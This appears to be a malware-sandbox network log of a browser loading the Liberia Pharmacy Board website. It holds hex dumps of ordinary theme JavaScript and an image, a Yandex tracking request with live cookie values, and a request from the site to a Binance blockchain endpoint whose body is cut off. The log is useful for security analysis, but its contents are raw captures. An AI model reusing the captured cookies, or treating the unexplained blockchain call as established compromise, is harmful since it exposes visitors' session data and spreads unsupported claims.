                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 65 66 6f 72 65 5f 61 66 74 65 72 2e 74 77 65 6e 74 79 74 77 65 6e 74 79 2d 63 6f 6e 74 61 69 6e 65 72 3a 6e 6f 74 28 2e 6d 66 6e 2d 69 6e 69 74 69 61 6c 69 7a 65 64 29 27 29 2e 6c 65 6e 67 74 68 20 29 7b 0a 0a 20 20 20 20 20 20 24 28 27 2e 6d 66 6e 2d 70 6f 70 75 70 2d 74 6d 70 6c 2e 6d 66 6e 2d 70 6f 70 75 70 2d 61 63 74 69 76 65 20 2e 62 65 66 6f 72 65 5f 61 66 74 65 72 2e 74 77 65 6e 74 79 74 77 65 6e 74 79 2d 63 6f 6e 74 61 69 6e 65 72 3a 6e 6f 74 28 2e 6d 66 6e 2d 69 6e 69 74 69 61 6c 69 7a 65 64 29 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 65 6c 20 3d 20 24 28 74 68 69 73 29 3b 0a 20 20 20 20 20 20 20 20 65 6c 2e 61 64 64 43 6c 61 73 73 28 27 6d 66 6e 2d 69 6e 69 74 69 61 6c 69 7a 65 64 27 29
                                                                                                                        Data Ascii: efore_after.twentytwenty-container:not(.mfn-initialized)').length ){ $('.mfn-popup-tmpl.mfn-popup-active .before_after.twentytwenty-container:not(.mfn-initialized)').each(function(){ var el = $(this); el.addClass('mfn-initialized')
                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 20 20 20 69 66 28 20 72 65 73 69 7a 65 20 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 77 69 6e 64 6f 77 29 2e 74 72 69 67 67 65 72 28 27 72 65 73 69 7a 65 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 49 73 6f 74 6f 70 65 20 69 6e 69 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 20 27 64 6f 2d 6e 6f 74 2d 72 75 6e 27 20 21 3d 3d 20 69 74 65 6d 2e 73 65 74 74 69 6e 67 73 20 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 71 75 65 75 65 4d 69 63 72 6f 74 61 73 6b 28 28 29 20 3d 3e 20 24 28 20 69 74 65 6d 2e 6c 6f 63 61 74 69 6f 6e 20 29 2e 69 73 6f 74 6f 70 65 28 20 69 74 65 6d 2e 73 65 74 74 69 6e 67 73 20 29 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20
                                                                                                                        Data Ascii: if( resize ){ $(window).trigger('resize'); } // Isotope init if( 'do-not-run' !== item.settings ){ queueMicrotask(() => $( item.location ).isotope( item.settings )); }
                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 65 74 27 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 24 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 27 64 65 62 6f 75 6e 63 65 64 72 65 73 69 7a 65 27 2c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 0a 20 20 20 20 20 20 69 66 28 20 24 28 77 69 6e 64 6f 77 29 2e 77 69 64 74 68 28 29 20 3c 20 37 36 37 20 29 7b 0a 20 20 20 20 20 20 20 20 73 63 72 65 65 6e 20 3d 20 27 6d 6f 62 69 6c 65 27 3b 0a 20 20 20 20 20 20 7d 65 6c 73 65 20 69 66 28 24 28 77 69 6e 64 6f 77 29 2e 77 69 64 74 68 28 29 20 3c 20 39 35 39 29 7b 0a 20 20 20 20 20 20 20 20 73 63 72 65 65 6e 20 3d 20 27 74 61 62 6c 65 74 27 3b 0a 20 20 20 20 20 20 7d 65 6c 73 65 20 69 66 28 24 28 77 69 6e 64 6f 77 29 2e 77 69 64 74 68 28 29 20 3e 20 39 36 30 29 7b 0a 20 20 20 20 20 20 20 20 73 63 72 65 65 6e 20 3d 20 27 64 65
                                                                                                                        Data Ascii: et'; } $(window).on('debouncedresize', function() { if( $(window).width() < 767 ){ screen = 'mobile'; }else if($(window).width() < 959){ screen = 'tablet'; }else if($(window).width() > 960){ screen = 'de
                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 65 67 61 2d 6d 65 6e 75 2d 6c 69 6e 6b 27 29 20 29 7b 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 20 2f 2f 20 46 49 58 3a 20 70 6c 75 67 69 6e 20 6d 61 78 6d 65 67 61 6d 65 6e 75 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 69 66 28 20 27 23 27 20 3d 3d 20 24 28 74 68 69 73 29 2e 61 74 74 72 28 27 68 72 65 66 27 29 20 29 7b 0a 20 20 20 20 20 20 20 20 20 20 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 20 20 20 20 20 20 63 6c 6f 73 65 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 2c 35 30 30 29 3b 0a 0a 20 20 20 20 20 20 7d 29 3b 0a 0a
                                                                                                                        Data Ascii: ega-menu-link') ){ return; // FIX: plugin maxmegamenu } if( '#' == $(this).attr('href') ){ e.preventDefault(); return; } setTimeout(function(){ close(); },500); });
                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 65 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 73 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 79 6f 75 74 75 62 65 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 64 65 78 3a 20 27 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3a 20 27 76 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 72 63 3a 20 27 2f 2f 77 77 77 2e 79 6f 75 74 75 62 65 2e 63 6f 6d 2f 65 6d 62 65 64 2f 25 69 64 25 3f 61 75 74 6f 70 6c 61 79 3d 31 26 72 65 6c 3d 30 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 79 6f 75 74 75 5f 62 65 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 64 65 78 3a 20 27
                                                                                                                        Data Ascii: e: { patterns: { youtube: { index: 'youtube.com/', id: 'v=', src: '//www.youtube.com/embed/%id%?autoplay=1&rel=0' }, youtu_be: { index: '
                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 72 48 28 29 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 72 73 74 2e 61 64 64 43 6c 61 73 73 28 27 63 75 72 72 65 6e 74 2d 6d 65 6e 75 2d 69 74 65 6d 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 63 6c 69 63 6b 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 6d 65 6e 75 5f 69 74 65 6d 20 3d 20 24 28 27 23 6d 65 6e 75 20 61 5b 64 61 74 61 2d 68 61 73 68 5d 27 29 3b 0a 20 20 20 20 20 20 20 20 69 66 28 20 24 28 27 23 6d 66 6e 2d 68 65 61 64 65 72 2d 74 65 6d 70 6c 61 74 65 27 29 2e 6c 65 6e 67 74 68 20 29 20 6d 65 6e 75 5f 69 74 65 6d 20 3d 20 24 28 27 23 6d 66 6e 2d 68 65 61 64 65 72 2d 74 65 6d 70 6c 61 74 65 20 2e 6d 66 6e 2d 68 65
                                                                                                                        Data Ascii: rH())) { first.addClass('current-menu-item'); } } } // click var menu_item = $('#menu a[data-hash]'); if( $('#mfn-header-template').length ) menu_item = $('#mfn-header-template .mfn-he
                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 61 6e 67 75 61 67 65 2d 63 75 72 72 65 6e 74 29 27 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 65 6c 20 3d 20 24 28 74 68 69 73 29 2e 63 68 69 6c 64 72 65 6e 28 27 61 27 29 3b 0a 0a 20 20 20 20 20 20 20 20 69 66 20 28 21 65 6c 2e 63 68 69 6c 64 72 65 6e 28 27 73 70 61 6e 3a 6e 6f 74 28 2e 69 63 6c 5f 6c 61 6e 67 5f 73 65 6c 5f 62 72 61 63 6b 65 74 29 27 29 2e 6c 65 6e 67 74 68 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 65 6c 2e 77 72 61 70 49 6e 6e 65 72 28 27 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 27 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 7d 29 3b 0a 0a 20 20 20 20 20 20 24 28 27 23 6d 65 6e 75 20 73 70 61 6e 2e 69 63 6c 5f 6c 61 6e 67 5f 73 65 6c 5f 62 72 61 63 6b 65 74 27 29 2e 65
                                                                                                                        Data Ascii: anguage-current)').each(function() { var el = $(this).children('a'); if (!el.children('span:not(.icl_lang_sel_bracket)').length) { el.wrapInner('<span></span>'); } }); $('#menu span.icl_lang_sel_bracket').e
                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 20 2f 2a 2a 0a 20 20 20 20 20 2a 20 46 61 6b 65 20 74 61 62 73 0a 20 20 20 20 20 2a 2f 0a 0a 20 20 20 20 24 28 27 2e 66 61 6b 65 2d 74 61 62 73 20 3e 20 75 6c 27 29 2e 6f 6e 28 27 63 6c 69 63 6b 27 2c 20 27 61 27 2c 20 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 0a 20 20 20 20 20 20 76 61 72 20 24 6c 69 20 3d 20 24 28 74 68 69 73 29 2e 63 6c 6f 73 65 73 74 28 27 6c 69 27 29 3b 0a 0a 20 20 20 20 20 20 76 61 72 20 74 61 62 20 3d 20 24 6c 69 2e 64 61 74 61 28 27 74 61 62 27 29 3b 0a 0a 20 20 20 20 20 20 69 66 28 20 24 6c 69 2e 68 61 73 43 6c 61 73 73 28 27 61 63 74 69 76 65 27 29 20 29 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20
                                                                                                                        Data Ascii: /** * Fake tabs */ $('.fake-tabs > ul').on('click', 'a', function(e) { e.preventDefault(); var $li = $(this).closest('li'); var tab = $li.data('tab'); if( $li.hasClass('active') ){ return; }


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        74192.168.2.74988287.250.251.1194432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:51 UTC2206OUTGET /watch/99162160/1?wmode=7&page-url=https%3A%2F%2Fwww.lpb.gov.lr%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22117%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228%22%2C%22Chromium%22%3Bv%3D%22117%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A117.0.5938.134%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22117.0.5938.134%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228.0.0.0%22%2C%22Chromium%22%3Bv%3D%22117.0.5938.134%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A10.0.0&browser-info=pv%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A0%3Als%3A632894401814%3Ahid%3A756856224%3Az%3A-300%3Ai%3A20250110085448%3Aet%3A1736517288%3Ac%3A1%3Arn%3A547745590%3Arqn%3A1%3Au%3A1736517288271535202%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Afp%3A6235%3Awv%3A2%3Ads%3A48%2C619%2C732%2C264%2C2544%2C0%2C%2C%2C%2C%2C%2C%2C%3Aco%3A0%3Acpf%3A1%3Ans%3A1736517279176%3Arqnl%3A1%3Ast%3A1736517290%3At%3ALiberia%20Pharmacy%20Board&t=gdpr%2814%29clc%280-0-0%29rqnt%281%29aw%281%29rcm%281%29cdl%28na%29eco%2842009088%29ti%2 [TRUNCATED]
                                                                                                                        Host: mc.yandex.com
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Origin: https://www.lpb.gov.lr
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: sync_cookie_csrf=3333922555fake; yashr=3155343561736517290; yabs-sid=592303851736517291; i=ZhczPKj1Pp8lae9ib1TlFHUuJH6rvbsWqVPzsKIF/YzrWRf9LlXRFlQZNwaHbc+gmtAcojXRBA+HJxkuMOrmPVcje+w=; yandexuid=4571074561736517291; yuidss=4571074561736517291; ymex=1768053291.yrts.1736517291#1768053291.yrtsi.1736517291; receive-cookie-deprecation=1; bh=Ej4iR29vZ2xlIENocm9tZSI7dj0iMTE3IiwiTm90O0E9QnJhbmQiO3Y9IjgiLCJDaHJvbWl1bSI7dj0iMTE3IhoFIng4NiIiECIxMTcuMC41OTM4LjEzNCIqAj8wOgkiV2luZG93cyJCCCIxMC4wLjAiSgQiNjQiUlsiR29vZ2xlIENocm9tZSI7dj0iMTE3LjAuNTkzOC4xMzQiLCJOb3Q7QT1CcmFuZCI7dj0iOC4wLjAuMCIsIkNocm9taXVtIjt2PSIxMTcuMC41OTM4LjEzNCIi
                                                                                                                        2025-01-10 13:54:51 UTC813INHTTP/1.1 200 Ok
                                                                                                                        Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                        Access-Control-Allow-Origin: https://www.lpb.gov.lr
                                                                                                                        Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                        Connection: Close
                                                                                                                        Content-Length: 611
                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:51 GMT
                                                                                                                        Expires: Fri, 10-Jan-2025 13:54:51 GMT
                                                                                                                        Last-Modified: Fri, 10-Jan-2025 13:54:51 GMT
                                                                                                                        Pragma: no-cache
                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                        2025-01-10 13:54:51 UTC611INData Raw: 7b 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 61 75 74 6f 5f 67 6f 61 6c 73 22 3a 30 2c 22 62 75 74 74 6f 6e 5f 67 6f 61 6c 73 22 3a 30 2c 22 63 5f 72 65 63 70 22 3a 22 31 2e 30 30 30 30 30 22 2c 22 66 6f 72 6d 5f 67 6f 61 6c 73 22 3a 30 2c 22 70 63 73 22 3a 22 31 22 2c 22 77 65 62 76 69 73 6f 72 22 3a 7b 22 61 72 63 68 5f 74 79 70 65 22 3a 22 6e 6f 6e 65 22 2c 22 64 61 74 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 32 20 30 31 3a 32 38 3a 32 35 22 2c 22 66 6f 72 6d 73 22 3a 31 2c 22 72 65 63 70 22 3a 22 31 2e 30 30 30 30 30 22 7d 2c 22 73 62 70 22 3a 20 7b 22 61 22 3a 22 67 32 6d 41 78 6a 79 4f 79 75 66 50 69 57 4d 4a 74 41 31 44 74 4b 54 50 62 34 6f 44 77 38 55 4c 69 73 79 69 58 53 76 6f 56 42 66 6a 69 75 76 71 31 50 54 4a 70 64 35 43 66 57 42 34 73 53 79 73 22
                                                                                                                        Data Ascii: {"settings":{"auto_goals":0,"button_goals":0,"c_recp":"1.00000","form_goals":0,"pcs":"1","webvisor":{"arch_type":"none","date":"2024-12-22 01:28:25","forms":1,"recp":"1.00000"},"sbp": {"a":"g2mAxjyOyufPiWMJtA1DtKTPb4oDw8ULisyiXSvoVBfjiuvq1PTJpd5CfWB4sSys"


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        75192.168.2.74988369.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:51 UTC490OUTGET /wp-content/uploads/2017/02/Miscellaneous-480x360.jpg HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
                                                                                                                        2025-01-10 13:54:51 UTC348INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:51 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 14:20:25 GMT
                                                                                                                        ETag: "9d83-60e9821cd9bb5"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 40323
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:51 GMT
                                                                                                                        Vary: User-Agent
                                                                                                                        Content-Type: image/jpeg
                                                                                                                        2025-01-10 13:54:51 UTC7844INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 19 bb 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 05 a0 00 00 01 01 00 03 00 00 00 01 04 38 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d3 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 31 2e 32 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 34 3a 30 31 3a 31 30 20 31 34 3a
                                                                                                                        Data Ascii: JFIFHHExifMM*8(12i HHAdobe Photoshop 21.2 (Windows)2024:01:10 14:
                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 31 30 45 34 31 39 39 34 45 31 33 38 46 39 43 38 31 22 20 64 63 3a 66 6f 72 6d 61 74 3d 22 69 6d 61 67 65 2f 6a 70 65 67 22 20 70 68 6f 74 6f 73 68 6f 70 3a 4c 65 67 61 63 79 49 50 54 43 44 69 67 65 73 74 3d 22 45 38 46 31 35 43 46 33 32 46 43 31 31 38 41 31 41 32 37 42 36 37 41 44 43 35 36 34 44 35 42 41 22 20 70 68 6f 74 6f 73 68 6f 70 3a 43 6f 6c 6f 72 4d 6f 64 65 3d 22 33 22 20 70 68 6f 74 6f 73 68 6f 70 3a 49 43 43 50 72 6f 66 69 6c 65 3d 22 75 52 47 42 22 20 78 6d 70 3a 43 72 65 61 74 65 44 61 74 65 3d 22 32 30 32 34 2d 30 31 2d 31 30 54 30 39 3a 35 32 3a 35 39 5a 22 20 78 6d 70 3a 4d 6f 64 69 66 79 44 61 74 65 3d 22 32 30 32 34 2d 30 31 2d 31 30 54 31 34 3a 31 39 3a 33 33 5a 22 20 78 6d 70 3a 4d 65 74 61 64 61 74 61 44 61 74 65 3d 22 32 30 32 34 2d
                                                                                                                        Data Ascii: 10E41994E138F9C81" dc:format="image/jpeg" photoshop:LegacyIPTCDigest="E8F15CF32FC118A1A27B67ADC564D5BA" photoshop:ColorMode="3" photoshop:ICCProfile="uRGB" xmp:CreateDate="2024-01-10T09:52:59Z" xmp:ModifyDate="2024-01-10T14:19:33Z" xmp:MetadataDate="2024-
                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 85 58 4d e2 32 4c f2 51 92 1d a3 91 d1 3c 3d 8e 2d 70 39 04 2d e9 d4 95 39 29 c1 e1 a3 49 d3 8c e2 e3 25 94 cb 45 ae e0 2b e1 c9 c0 95 bc 1c 3e f5 ee 78 6d fa ba a7 97 de 5c ff 00 93 c6 71 0b 27 6d 53 0b ba f9 19 ab a2 50 08 02 00 80 20 08 02 00 80 20 08 02 00 80 20 08 02 00 80 20 08 08 8a ca 8e 9e 43 83 e2 37 80 53 c2 38 44 52 79 31 d6 e6 a1 00 40 10 18 f7 08 3c 26 82 a6 1f ed 22 73 7d 60 ad 64 b2 9a 34 a8 b3 16 8d 1e 46 09 07 a9 73 4f 34 10 04 01 00 40 78 d3 70 6b e3 fe cd c4 0f 37 31 ec 2b 2f c4 92 a7 34 fc 4c eb 7d c6 6b 4d 5c 75 b4 ee dd 7c 47 3d c4 75 83 dc 91 6d 3c a3 14 a6 e1 25 28 9b 7b 4f df 29 ef f6 c8 6b 60 c3 4b 9a 3a 48 f3 93 1b b1 c4 15 d1 8c 94 96 51 e8 69 d4 8c d6 62 49 2d 89 0e 5a d2 f7 06 b4 64 93 80 16 01 71 b3 db 1b 6f a7 e2 01 99 fc
                                                                                                                        Data Ascii: XM2LQ<=-p9-9)I%E+>xm\q'mSP C7S8DRy1@<&"s}`d4FsO4@xpk71+/4L}kM\u|G=um<%({O)k`K:HQibI-Zdqo
                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: 6b bf 3f d2 ff 00 96 1f c4 e5 f5 2e 03 ee 25 e6 7c bb 88 7b c5 e4 51 e3 8a 49 5d bb 1b 1c f7 76 34 64 ae db 69 73 28 25 92 bf a9 29 e6 a6 b9 18 e7 89 f1 3f 71 a7 75 ed 20 e1 44 da 7b a3 a9 68 b1 4f 73 9d 33 4d 35 4d c1 cc 82 29 25 70 8c 92 d6 34 93 8c f7 22 92 5c c5 da cc 36 27 e4 8d f1 3b 76 46 39 8e 1d 4e 18 2a 54 d3 e4 72 cb d6 c8 3e 7a ad ff 00 2d ff 00 b8 2e 1f 1d f7 51 f3 fd 8e 87 0e ef bf 23 6c 2f 2a 76 0c cb 33 77 ee 74 e3 fc 59 f5 28 ea f7 19 b4 3b c5 5f 5c be 4d 39 75 ba 54 df 6c e2 e5 63 ac 70 9b a7 63 71 2c 24 37 1e 2b fa 88 c7 23 c0 af 41 c3 5c 6b d0 87 e1 ea 69 ab 05 cb a3 eb c8 e6 dc c6 50 aa d5 48 e6 12 7c fc 3e 66 a9 ba fe 1a d3 3b da df 43 6a a7 56 da 03 da d7 80 f0 c9 29 89 3c 23 9a 13 c0 8e ac e3 8a bb db 46 e9 fe 1a f2 18 97 d9 fc 53
                                                                                                                        Data Ascii: k?.%|{QI]v4dis(%)?qu D{hOs3M5M)%p4"\6';vF9N*Tr>z-.Q#l/*v3wtY(;_\M9uTlcpcq,$7+#A\kiPH|>f;CjV)<#FS
                                                                                                                        2025-01-10 13:54:51 UTC8000INData Raw: ff 00 2b 31 ef df 28 ca 4b 8d be 3a 2b 6d 35 d2 dc 30 7a 49 9b b8 5e 7b 00 f1 b8 0e d3 cd 58 b3 bc a1 4a 6e a5 58 6a f0 5d 08 6b f1 65 38 e9 86 51 09 a7 be 50 97 5b 0c a0 49 1c f7 2a 67 3b c7 8a a6 5e 20 76 b5 dc 48 3d dc 95 fb ee 21 c3 ee 16 61 49 c6 5f 0c 7e 85 7b 6e 29 52 93 f6 9e 51 77 1f 2a 4d 3d d7 62 ba ff 00 e6 8f ff 00 e9 70 bb 54 74 7d 77 4b f2 b3 1e 9f e5 35 60 8a aa a6 67 59 2e 84 4a 5b 80 0c 7c 30 3e d2 de 55 d3 8a 58 e4 69 1e 33 4d 36 f4 b2 9b b4 3d a4 e8 7d 73 48 e7 47 66 bb db 2e 2d 70 92 3a b8 3a 3f 2c 72 2e 1b dc 7c fc 0f 7a e9 d9 71 ca b6 eb 43 f6 a3 e0 ff 00 62 19 f1 1b 79 4b 5a 83 4f e4 6b 7d 41 a9 af 7a a1 94 6d bc 57 1a c7 51 46 62 8a 49 1a 37 f7 49 cf 8c ec 65 de 9c ae 9d 0e 3d 69 41 be ce 9b 59 ff 00 7c 4d 65 c5 23 2e 69 9b 7e c7
                                                                                                                        Data Ascii: +1(K:+m50zI^{XJnXj]ke8QP[I*g;^ vH=!aI_~{n)RQw*M=bpTt}wK5`gY.J[|0>UXi3M6=}sHGf.-p::?,r.|zqCbyKZOk}AzmWQFbI7Ie=iAY|Me#.i~
                                                                                                                        2025-01-10 13:54:51 UTC479INData Raw: c6 79 06 5f e8 fa a3 cc bc e5 e7 13 ad 72 f1 27 85 e0 75 28 5a 42 97 2e 65 a5 ac 6b 06 1a 00 0b 9c 5a 3b 2c 19 08 02 00 80 20 08 02 00 80 20 08 02 00 80 20 08 02 00 80 20 08 02 00 80 20 08 02 00 80 20 08 02 00 80 20 3a 4d 0c 73 c4 f8 a6 8d 92 46 f1 ba e6 3c 64 38 76 10 b2 9b 4f 28 c1 50 93 67 6f b7 4a f9 b4 a5 fe e3 a7 8b 8e f1 a6 88 89 a9 49 fd 93 f8 0f 41 0a fa bf d4 b1 5e 0a 5f 1e 4f ea 8d 34 63 ba f0 72 28 36 9d 18 e8 c6 ac b2 ca df af 25 b4 87 7a 83 b0 b3 da 59 73 ec df d4 62 7e 27 8c da 1b 50 5f 01 66 a5 d6 15 75 b4 e7 ca a4 a4 88 52 c4 f1 d8 ed df 19 c3 d2 b2 af 29 53 f7 34 d2 7e 2f 76 63 44 9f 36 59 6d 5a 7a df 67 a7 8e 9e 92 9d 8c 8e 21 86 35 ad c3 5b e6 0a 95 4a d3 a8 dc a4 f7 36 50 48 92 51 1b 84 01 00 40 10 04 07 18 40 72 80 20 08 02 00 80 20
                                                                                                                        Data Ascii: y_r'u(ZB.ekZ;, :MsF<d8vO(PgoJIA^_O4cr(6%zYsb~'P_fuR)S4~/vcD6YmZzg!5[J6PHQ@@r


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        76192.168.2.74988435.71.137.1054432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:51 UTC604OUTPOST / HTTP/1.1
                                                                                                                        Host: bsc-dataseed.binance.org
                                                                                                                        Connection: keep-alive
                                                                                                                        Content-Length: 173
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Content-Type: application/json
                                                                                                                        Accept: */*
                                                                                                                        Origin: https://www.lpb.gov.lr
                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
